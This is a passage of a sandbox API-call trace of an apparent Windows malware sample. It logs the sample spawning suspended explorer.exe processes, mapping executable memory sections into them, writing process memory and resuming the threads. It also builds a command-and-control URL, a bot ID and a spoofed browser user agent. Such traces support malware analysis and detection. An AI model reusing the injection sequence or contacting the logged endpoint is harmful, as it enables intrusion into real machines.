BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x47e0000, SectionOffset=0x0, ViewSize=0x746f750*=0x6b000) returned 0x0 [0158.216] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x47e0000) returned 0x0 [0158.219] NtMapViewOfSection (in: SectionHandle=0x610, ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x47e0000, SectionOffset=0x0, ViewSize=0x746f750*=0x74000) returned 0x0 [0158.224] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x47e02cd) returned 0x0 [0158.436] NtQueryInformationProcess (in: ProcessHandle=0x634, ProcessInformationClass=0x1a, ProcessInformation=0x746f7b8, ProcessInformationLength=0x8, ReturnLength=0x0 | out: ProcessInformation=0x746f7b8, ReturnLength=0x0) returned 0x0 [0158.436] ReadProcessMemory (in: hProcess=0x634, lpBaseAddress=0x7efde008, lpBuffer=0x746f7a8, nSize=0x4, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x746f7a8*, lpNumberOfBytesRead=0x746f7a0*=0x4) returned 1 [0158.436] GetProcessHeap () returned 0x210000 [0158.436] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x198) returned 0x4644680 [0158.436] ReadProcessMemory (in: hProcess=0x634, lpBaseAddress=0x550000, lpBuffer=0x4644680, nSize=0x190, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x4644680*, lpNumberOfBytesRead=0x746f7a0*=0x190) returned 1 [0158.436] GetProcessHeap () returned 0x210000 [0158.436] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x4644680) returned 1 [0158.436] WriteProcessMemory (in: hProcess=0x634, lpBaseAddress=0x580efa, lpBuffer=0x746f7b0*, nSize=0x7, lpNumberOfBytesWritten=0x746f7a0 | out: lpBuffer=0x746f7b0*, lpNumberOfBytesWritten=0x746f7a0*=0x7) returned 1 [0158.438] CloseHandle (hObject=0x610) returned 1 [0158.438] CloseHandle (hObject=0x5fc) returned 1 [0158.438] ResumeThread (hThread=0x644) returned 0x1 [0158.438] GetProcessHeap () returned 0x210000 [0158.438] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x7677120) returned 1 [0158.438] CloseHandle (hObject=0x644) returned 1 [0158.438] CloseHandle (hObject=0x634) returned 1 [0158.438] GetProcessHeap () returned 0x210000 [0158.438] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fde90) returned 1 [0158.438] GetProcessHeap () returned 0x210000 [0158.438] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fc6f0) returned 1 [0158.438] Sleep (dwMilliseconds=0x3e8) [0159.831] GetProcessHeap () returned 0x210000 [0159.831] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fc6f0 [0159.831] GetWindowsDirectoryA (in: lpBuffer=0x2fc6f0, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0159.831] GetProcessHeap () returned 0x210000 [0159.831] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fde90 [0159.831] GetProcessHeap () returned 0x210000 [0159.831] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x17) returned 0x464c680 [0159.831] wsprintfA (in: param_1=0x2fde90, param_2="%s%s" | out: param_1="C:\\Windows\\explorer.exe") returned 23 [0159.831] GetProcessHeap () returned 0x210000 [0159.831] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x464c680) returned 1 [0159.831] CreateProcessInternalA (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Windows\\explorer.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x746f900*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x746f8b8, hNewToken=0x0 | out: lpProcessInformation=0x746f8b8*(hProcess=0x644, hThread=0x634, dwProcessId=0x3d0, dwThreadId=0x938), hNewToken=0x0) returned 1 [0159.836] GetProcessHeap () returned 0x210000 [0159.836] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x316c) returned 0x47933a0 [0159.837] lstrcatA (in: lpString1="", lpString2="604954A450752B96B72CF2C4FA84486C9C354B42" | out: lpString1="604954A450752B96B72CF2C4FA84486C9C354B42") returned="604954A450752B96B72CF2C4FA84486C9C354B42" [0159.837] GetCurrentProcessId () returned 0xbdc [0159.837] lstrcatA (in: lpString1="", lpString2="http://hockeysministries.org/playoff/chmpion4378/hockey.php" | out: lpString1="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned="http://hockeysministries.org/playoff/chmpion4378/hockey.php" [0159.837] lstrcatW (in: lpString1="", lpString2="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" | out: lpString1="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)") returned="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" [0159.837] VirtualQuery (in: lpAddress=0x47933a0, lpBuffer=0x746f730, dwLength=0x30 | out: lpBuffer=0x746f730*(BaseAddress=0x4793000, AllocationBase=0x45e0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0159.837] NtCreateSection (in: SectionHandle=0x746f7d0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7d0*=0x610) returned 0x0 [0159.838] NtMapViewOfSection (in: SectionHandle=0x610, ProcessHandle=0x644, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x50000, SectionOffset=0x0, ViewSize=0x746f750*=0xc000) returned 0x0 [0159.841] NtCreateSection (in: SectionHandle=0x746f7c8, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7c8*=0x5fc) returned 0x0 [0159.841] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0x644, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x60000, SectionOffset=0x0, ViewSize=0x746f750*=0x7000) returned 0x0 [0159.841] NtMapViewOfSection (in: SectionHandle=0x610, ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x3320000, SectionOffset=0x0, ViewSize=0x746f750*=0xc000) returned 0x0 [0159.842] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0159.843] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="RegCloseKey") returned 0x7fefdc10710 [0159.843] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0159.844] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptStringToBinaryA") returned 0x7fefd0ce59c [0159.844] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0159.844] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0159.845] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0159.845] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0159.846] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0159.846] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0159.846] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0159.847] GetProcAddress (hModule=0x76f50000, lpProcName="RtlComputeCrc32") returned 0x76f5c7b0 [0159.847] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x7fefe2b0000 [0159.848] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="CoInitialize") returned 0x7fefe2ca51c [0159.848] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x7fefe4c0000 [0159.848] GetProcAddress (hModule=0x7fefe4c0000, lpProcName="SHGetFolderPathW") returned 0x7fefe543ba4 [0159.849] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7fefdb70000 [0159.849] GetProcAddress (hModule=0x7fefdb70000, lpProcName="StrStrIA") returned 0x7fefdb75a1c [0159.849] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0159.850] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0159.850] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0159.851] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0159.851] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0159.852] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xc) returned 0x7fefe26d9a0 [0159.852] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x3320000) returned 0x0 [0159.853] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x7fe00000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x3320000, SectionOffset=0x0, ViewSize=0x746f750*=0x7000) returned 0x0 [0159.854] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x3320023) returned 0x0 [0159.856] NtQueryInformationProcess (in: ProcessHandle=0x644, ProcessInformationClass=0x0, ProcessInformation=0x746f7d8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x746f7d8, ReturnLength=0x0) returned 0x0 [0159.856] ReadProcessMemory (in: hProcess=0x644, lpBaseAddress=0x7fffffd9010, lpBuffer=0x746f7a8, nSize=0x8, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x746f7a8*, lpNumberOfBytesRead=0x746f7a0*=0x8) returned 1 [0159.856] GetProcessHeap () returned 0x210000 [0159.856] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x198) returned 0x4644680 [0159.856] ReadProcessMemory (in: hProcess=0x644, lpBaseAddress=0xff260000, lpBuffer=0x4644680, nSize=0x190, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x4644680*, lpNumberOfBytesRead=0x746f7a0*=0x190) returned 1 [0159.856] GetProcessHeap () returned 0x210000 [0159.856] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x4644680) returned 1 [0159.856] WriteProcessMemory (in: hProcess=0x644, lpBaseAddress=0xff28b790, lpBuffer=0x746f7b8*, nSize=0x10, lpNumberOfBytesWritten=0x746f7a0 | out: lpBuffer=0x746f7b8*, lpNumberOfBytesWritten=0x746f7a0*=0x10) returned 1 [0159.856] CloseHandle (hObject=0x5fc) returned 1 [0159.857] CloseHandle (hObject=0x610) returned 1 [0159.857] ResumeThread (hThread=0x634) returned 0x1 [0159.857] GetProcessHeap () returned 0x210000 [0159.857] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x47933a0) returned 1 [0159.857] CloseHandle (hObject=0x634) returned 1 [0159.857] CloseHandle (hObject=0x644) returned 1 [0159.857] GetProcessHeap () returned 0x210000 [0159.857] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fde90) returned 1 [0159.857] GetProcessHeap () returned 0x210000 [0159.857] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fc6f0) returned 1 [0159.857] Sleep (dwMilliseconds=0x3e8) [0160.904] GetProcessHeap () returned 0x210000 [0160.904] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fc6f0 [0160.904] GetSystemWow64DirectoryA (in: lpBuffer=0x2fc6f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\SysWOW64") returned 0x13 [0160.904] GetProcessHeap () returned 0x210000 [0160.904] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fde90 [0160.904] GetProcessHeap () returned 0x210000 [0160.904] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x17) returned 0x464c680 [0160.904] wsprintfA (in: param_1=0x2fde90, param_2="%s%s" | out: param_1="C:\\Windows\\SysWOW64\\explorer.exe") returned 32 [0160.904] GetProcessHeap () returned 0x210000 [0160.904] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x464c680) returned 1 [0160.904] CreateProcessInternalA (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\explorer.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\SysWOW64", lpStartupInfo=0x746f900*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x746f8b8, hNewToken=0x0 | out: lpProcessInformation=0x746f8b8*(hProcess=0x634, hThread=0x644, dwProcessId=0x92c, dwThreadId=0x930), hNewToken=0x0) returned 1 [0160.909] GetProcessHeap () returned 0x210000 [0160.909] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2d6c) returned 0x47933a0 [0160.909] lstrcatA (in: lpString1="", lpString2="604954A450752B96B72CF2C4FA84486C9C354B42" | out: lpString1="604954A450752B96B72CF2C4FA84486C9C354B42") returned="604954A450752B96B72CF2C4FA84486C9C354B42" [0160.909] GetCurrentProcessId () returned 0xbdc [0160.909] lstrcatA (in: lpString1="", lpString2="http://hockeysministries.org/playoff/chmpion4378/hockey.php" | out: lpString1="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned="http://hockeysministries.org/playoff/chmpion4378/hockey.php" [0160.909] lstrcatW (in: lpString1="", lpString2="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" | out: lpString1="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)") returned="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" [0160.909] VirtualQuery (in: lpAddress=0x47933a0, lpBuffer=0x746f730, dwLength=0x30 | out: lpBuffer=0x746f730*(BaseAddress=0x4793000, AllocationBase=0x45e0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0160.909] NtCreateSection (in: SectionHandle=0x746f7d0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7d0*=0x5fc) returned 0x0 [0160.909] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0x634, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x70000, SectionOffset=0x0, ViewSize=0x746f750*=0xc000) returned 0x0 [0160.913] NtCreateSection (in: SectionHandle=0x746f7c8, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7c8*=0x610) returned 0x0 [0160.913] NtMapViewOfSection (in: SectionHandle=0x610, ProcessHandle=0x634, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x80000, SectionOffset=0x0, ViewSize=0x746f750*=0x6000) returned 0x0 [0160.914] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x3320000, SectionOffset=0x0, ViewSize=0x746f750*=0xc000) returned 0x0 [0160.914] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x3320000) returned 0x0 [0160.915] NtMapViewOfSection (in: SectionHandle=0x610, ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x3320000, SectionOffset=0x0, ViewSize=0x746f750*=0x6000) returned 0x0 [0160.916] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x33202cd) returned 0x0 [0160.919] NtQueryInformationProcess (in: ProcessHandle=0x634, ProcessInformationClass=0x1a, ProcessInformation=0x746f7b8, ProcessInformationLength=0x8, ReturnLength=0x0 | out: ProcessInformation=0x746f7b8, ReturnLength=0x0) returned 0x0 [0160.919] ReadProcessMemory (in: hProcess=0x634, lpBaseAddress=0x7efde008, lpBuffer=0x746f7a8, nSize=0x4, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x746f7a8*, lpNumberOfBytesRead=0x746f7a0*=0x4) returned 1 [0160.919] GetProcessHeap () returned 0x210000 [0160.919] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x198) returned 0x4644680 [0160.919] ReadProcessMemory (in: hProcess=0x634, lpBaseAddress=0x550000, lpBuffer=0x4644680, nSize=0x190, lpNumberOfBytesRead=0x746f7a0 | out: lpBuffer=0x4644680*, lpNumberOfBytesRead=0x746f7a0*=0x190) returned 1 [0160.919] GetProcessHeap () returned 0x210000 [0160.919] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x4644680) returned 1 [0160.919] WriteProcessMemory (in: hProcess=0x634, lpBaseAddress=0x580efa, lpBuffer=0x746f7b0*, nSize=0x7, lpNumberOfBytesWritten=0x746f7a0 | out: lpBuffer=0x746f7b0*, lpNumberOfBytesWritten=0x746f7a0*=0x7) returned 1 [0160.920] CloseHandle (hObject=0x610) returned 1 [0160.920] CloseHandle (hObject=0x5fc) returned 1 [0160.920] ResumeThread (hThread=0x644) returned 0x1 [0160.920] GetProcessHeap () returned 0x210000 [0160.920] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x47933a0) returned 1 [0160.920] CloseHandle (hObject=0x644) returned 1 [0160.920] CloseHandle (hObject=0x634) returned 1 [0160.920] GetProcessHeap () returned 0x210000 [0160.920] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fde90) returned 1 [0160.920] GetProcessHeap () returned 0x210000 [0160.920] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fc6f0) returned 1 [0160.920] Sleep (dwMilliseconds=0x3e8) [0161.922] GetProcessHeap () returned 0x210000 [0161.922] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fc6f0 [0161.922] GetWindowsDirectoryA (in: lpBuffer=0x2fc6f0, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0161.922] GetProcessHeap () returned 0x210000 [0161.922] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fde90 [0161.922] GetProcessHeap () returned 0x210000 [0161.922] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x17) returned 0x464c680 [0161.922] wsprintfA (in: param_1=0x2fde90, param_2="%s%s" | out: param_1="C:\\Windows\\explorer.exe") returned 23 [0161.922] GetProcessHeap () returned 0x210000 [0161.922] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x464c680) returned 1 [0161.922] CreateProcessInternalA (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Windows\\explorer.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x746f900*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x746f8b8, hNewToken=0x0 | out: lpProcessInformation=0x746f8b8*(hProcess=0x644, hThread=0x634, dwProcessId=0x924, dwThreadId=0x920), hNewToken=0x0) returned 1 [0161.925] GetProcessHeap () returned 0x210000 [0161.925] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x376c) returned 0x478c310 [0161.925] lstrcatA (in: lpString1="", lpString2="604954A450752B96B72CF2C4FA84486C9C354B42" | out: lpString1="604954A450752B96B72CF2C4FA84486C9C354B42") returned="604954A450752B96B72CF2C4FA84486C9C354B42" [0161.925] GetCurrentProcessId () returned 0xbdc [0161.925] lstrcatA (in: lpString1="", lpString2="http://hockeysministries.org/playoff/chmpion4378/hockey.php" | out: lpString1="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned="http://hockeysministries.org/playoff/chmpion4378/hockey.php" [0161.925] lstrcatW (in: lpString1="", lpString2="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" | out: lpString1="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)") returned="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)" [0161.925] VirtualQuery (in: lpAddress=0x478c310, lpBuffer=0x746f730, dwLength=0x30 | out: lpBuffer=0x746f730*(BaseAddress=0x478c000, AllocationBase=0x45e0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x14000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0161.925] NtCreateSection (in: SectionHandle=0x746f7d0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7d0*=0x610) returned 0x0 [0161.925] NtMapViewOfSection (in: SectionHandle=0x610, ProcessHandle=0x644, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x50000, SectionOffset=0x0, ViewSize=0x746f750*=0xd000) returned 0x0 [0161.928] NtCreateSection (in: SectionHandle=0x746f7c8, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x746f748, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x746f7c8*=0x5fc) returned 0x0 [0161.928] NtMapViewOfSection (in: SectionHandle=0x5fc, ProcessHandle=0x644, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x60000, SectionOffset=0x0, ViewSize=0x746f750*=0x7000) returned 0x0 [0161.928] NtMapViewOfSection (in: SectionHandle=0x610, ProcessHandle=0xffffffffffffffff, BaseAddress=0x746f740*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x746f750*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x746f740*=0x3320000, SectionOffset=0x0, ViewSize=0x746f750*=0xd000) returned 0x0 [0161.929] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x7fefdbf0000 [0161.930] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="CryptHashData") returned 0x7fefdbfdac0 [0161.930] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x7fefd080000 [0161.931] GetProcAddress (hModule=0x7fefd080000, lpProcName="CryptBinaryToStringA") returned 0x7fefd0b4220 [0161.931] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x7fefc5b0000 [0161.931] GetProcAddress (hModule=0x7fefc5b0000, lpProcName="DnsFree") returned 0x7fefc5b1e74 [0161.931] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76e30000 [0161.932] GetProcAddress (hModule=0x76e30000, lpProcName="LoadLibraryA") returned 0x76e47070 [0161.932] GetProcAddress (hModule=0x76e30000, lpProcName="GetProcAddress") returned 0x76e53690 [0161.933] GetProcAddress (hModule=0x76e30000, lpProcName="VirtualProtect") returned 0x76e32ef0 [0161.933] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f50000 [0161.933] GetProcAddress (hModule=0x76f50000, lpProcName="NtCreateSection") returned 0x76fa17b0 [0161.933] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x7fefe4c0000 [0161.934] GetProcAddress (hModule=0x7fefe4c0000, lpProcName="SHGetSpecialFolderPathW") returned 0x7fefe4d98f0 [0161.934] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7fefdb70000 [0161.935] GetProcAddress (hModule=0x7fefdb70000, lpProcName="StrToIntA") returned 0x7fefdb8a7d0 [0161.935] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76d30000 [0161.935] GetProcAddress (hModule=0x76d30000, lpProcName="wsprintfW") returned 0x76d5099c [0161.935] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x7fef7150000 [0161.936] GetProcAddress (hModule=0x7fef7150000, lpProcName="WinHttpOpen") returned 0x7fef7153428 [0161.936] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x7fefe260000 [0161.937] GetProcAddress (hModule=0x7fefe260000, lpProcName=0xc) returned 0x7fefe26d9a0 [0161.937] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x3320000) returned 0x0 [0161.939] NtMapViewOfSection (in: SectionHandle=0x5fc, 